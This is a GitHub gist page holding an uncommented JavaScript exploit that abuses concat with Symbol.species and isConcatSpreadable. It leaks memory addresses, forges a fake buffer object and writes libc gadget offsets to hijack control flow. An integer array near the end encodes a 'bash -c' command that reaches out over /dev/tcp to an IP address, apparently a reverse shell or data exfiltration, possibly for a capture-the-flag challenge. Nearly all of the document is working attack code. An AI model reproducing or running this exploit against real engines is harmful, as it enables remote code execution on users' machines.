Created
April 25, 2017 13:40
-
-
Save pzread/6f1bbd562ec5d1296ab77bfd40919d1c to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var objs = []; | |
| var bases = []; | |
| let oris = []; | |
| let payloads = []; | |
| for (let i = 0; i < 2; i++) { | |
| objs.push([0x00010000]); | |
| bases.push([0, 1]); | |
| oris.push([100, 100, 100]); | |
| payloads.push([0]); | |
| } | |
| var dig = 0; | |
| function leak1() { | |
| let obj = objs[dig]; | |
| let base = bases[dig]; | |
| let ori = oris[dig]; | |
| let payload = payloads[dig]; | |
| dig += 1; | |
| class fake extends Object { | |
| static get [Symbol.species] () { | |
| return function () { | |
| return ori; | |
| } | |
| } | |
| } | |
| base.constructor = fake; | |
| Object.defineProperty(obj, Symbol.isConcatSpreadable, { | |
| get : function () { | |
| for (let i = 0; i < 64; i++) { | |
| obj.push(0x10010000); | |
| obj.push(0x0); | |
| } | |
| ori[0] = payload; | |
| ori[0][0] = 3; | |
| return true; | |
| } | |
| }); | |
| var x = base.concat(obj); | |
| return x; | |
| } | |
| let st = 'a'.repeat(1024); | |
| function constr() { | |
| let x = leak1(); | |
| x[0] = st; | |
| let y = leak1(); | |
| x[71] = x[10]; | |
| x[72] = 0x10020000; | |
| return y; | |
| } | |
| let y = constr(); | |
| let off = 78579 + 2; | |
| let fakebuf = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]; | |
| y[off] = fakebuf; | |
| y[off][0] = 1; | |
| let vtl = st.charCodeAt(0) | st.charCodeAt(1) * 0x10000; | |
| let vth = st.charCodeAt(2) | st.charCodeAt(3) * 0x10000; | |
| let bufl = st.charCodeAt(20) | st.charCodeAt(21) * 0x10000 + 0x18; | |
| let bufh = st.charCodeAt(22) | st.charCodeAt(23) * 0x10000; | |
| console.log(vtl); | |
| console.log(vth); | |
| console.log(bufl); | |
| console.log(bufh); | |
| function leak2() { | |
| let obj = [0x00010000, 0x0, 0x0]; | |
| let base = [0, 1, 2, 4, 5]; | |
| let ori = [100, 100, 100]; | |
| class fake extends Object { | |
| static get [Symbol.species] () { | |
| return function () { | |
| return ori; | |
| } | |
| } | |
| } | |
| base.constructor = fake; | |
| Object.defineProperty(obj, Symbol.isConcatSpreadable, { | |
| get : function () { | |
| obj[1] = bufl; | |
| obj[2] = bufh; | |
| ori[0] = fakebuf; | |
| ori[0][0] = 0; | |
| ori[1] = fakebuf; | |
| ori[1][0] = 0; | |
| ori[2] = st; | |
| return true; | |
| } | |
| }); | |
| var x = base.concat(obj); | |
| return x; | |
| } | |
| let z = leak2(); | |
| function trans(x) { | |
| if (x >= 0x80000000) { | |
| return -(0x100000000 - x); | |
| } else { | |
| return x; | |
| } | |
| } | |
| fakebuf[0] = trans(vtl); | |
| fakebuf[1] = trans(vth); | |
| fakebuf[2] = trans(bufl + 0x40); | |
| fakebuf[3] = trans(bufh); | |
| fakebuf[6] = 0x80005; | |
| fakebuf[7] = 0x0; | |
| fakebuf[8] = 0x100000; | |
| fakebuf[9] = 0x0; | |
| fakebuf[10] = trans(bufl + 0x50); | |
| fakebuf[11] = trans(bufh); | |
| fakebuf[12] = fakebuf[10]; | |
| fakebuf[13] = fakebuf[11]; | |
| fakebuf[16] = 0x1d; | |
| fakebuf[17] = 0x0; | |
| fakebuf[20] = 0x0; | |
| fakebuf[21] = 0x100000; | |
| fakebuf[22] = 0x110000; | |
| fakebuf[23] = 0x0; | |
| let w = z[3]; | |
| console.log(w.length); | |
| let stbl = z[2]; | |
| let stbo = (stbl - (bufl + 0x50 + 0x18)) / 4; | |
| w[stbo + 4] = vtl + 252736; | |
| w[stbo + 5] = vth; | |
| let libcl = (st.charCodeAt(0) | st.charCodeAt(1) * 0x10000) - 0x83580; | |
| let libch = st.charCodeAt(2) | st.charCodeAt(3) * 0x10000; | |
| console.log(libcl); | |
| console.log(libch); | |
| fakebuf[0] = trans(bufl + 0x60); | |
| fakebuf[1] = trans(bufh); | |
| fakebuf[24 + 76] = trans(libcl + 0x47b75); | |
| fakebuf[24 + 76 + 1] = trans(libch); | |
| fakebuf[0x68 / 4] = 0x41414141; | |
| fakebuf[0x68 / 4 + 1] = 0x0; | |
| fakebuf[0xa0 / 4] = trans(bufl + 0xb0); | |
| fakebuf[0xa0 / 4 + 1] = trans(bufh); | |
| fakebuf[0xa8 / 4] = trans(libcl + 0x21102); | |
| // fakebuf[0xa8 / 4] = trans(libcl + 0x30cad); | |
| fakebuf[0xa8 / 4 + 1] = trans(libch); | |
| fakebuf[0xb0 / 4] = trans(bufl + 0xc0); | |
| fakebuf[0xb0 / 4 + 1] = trans(bufh); | |
| fakebuf[0xb0 / 4 + 2] = trans(libcl + 0x45390); | |
| fakebuf[0xb0 / 4 + 3] = trans(libch); | |
| let bis = [1752392034, 543370528, 1935761959, 791035496, 796288356, 795894644, 774911025, 775041329, 825110835, 959394096, 540555321, 824589872, 39]; | |
| for (let i = 0; i < bis.length; i++) { | |
| fakebuf[0xb0 / 4 + 4 + i] = trans(bis[i]); | |
| } | |
| w[100] = 0; | |
| while(1) {} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment